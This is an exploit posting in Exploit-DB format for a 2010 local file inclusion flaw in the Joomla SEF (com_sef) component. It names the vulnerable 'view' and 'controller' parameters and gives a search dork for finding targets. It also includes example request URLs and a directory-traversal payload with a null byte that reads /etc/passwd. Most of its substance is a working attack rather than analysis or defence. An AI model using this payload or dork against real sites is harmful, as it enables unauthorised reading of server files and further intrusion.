Joomla! Component com_sef - Local File Inclusion

EDB-ID:

14213

CVE:

N/A

Author:

_mlk_

Type:

webapps

Platform:

PHP

Published:

2010-07-05

# Exploit Title: Joomla Component SEF (com_sef) - LFI Vulnerability
# Date: 04, July 2010

# Author:  _mlk_
# Software Link: http://bugsec.googlecode.com/files/Joomla_com_sef.zip
# Version: 0

# Tested on: all OS

# CVE : 0

# Code : here

Joomla Component SEF (com_sef) - Local File Inclusion Vulnerability

#########################################################################################


   [+] Discovered by : _mlk_ (Renan)

   [+] Teams : c00kies , BugSec , BotecoUnix & c0d3rs

   [+] Homepages :  http://code.google.com/p/bugsec/
                    http://botecounix.com.br/blog/
                    http://c0d3rs.wordpress.com/

   [+] Location : Porto Alegre - RS, Brasil
                         (or Brazil)

#########################################################################################


      [-] Information

   [?] Script : SEF (Search Engine Friendly)

   [?] Home Script : http://www.joomla.com/

   [?] Dork/String :  "index.php?option=com_sef" / "com_sef"

   [?] Date :  04, July 2010


-----------------------------------------------------------------------------------------


      [*] Parameters vuls :

         view
         controller


-----------------------------------------------------------------------------------------


      [*] Example :

         http://localhost/index.php?option=com_sef&controller=[LFI]%00
         http://localhost/[PATH]/index.php?option=com_sef&controller=[LFI]%00


-----------------------------------------------------------------------------------------


      [*] Demo :

         http://<server>/index.php?option=com_sef&controller=
         ../../../../../../../../../../../../../../../etc/passwd%00


#########################################################################################


    [~] Agradecimentos :

        Deus , Familiares , Amigos e Tricolor Gaúcho (Grémio) .
        Em especial "m0nad" ( capitao caverna \o/ ) .


#########################################################################################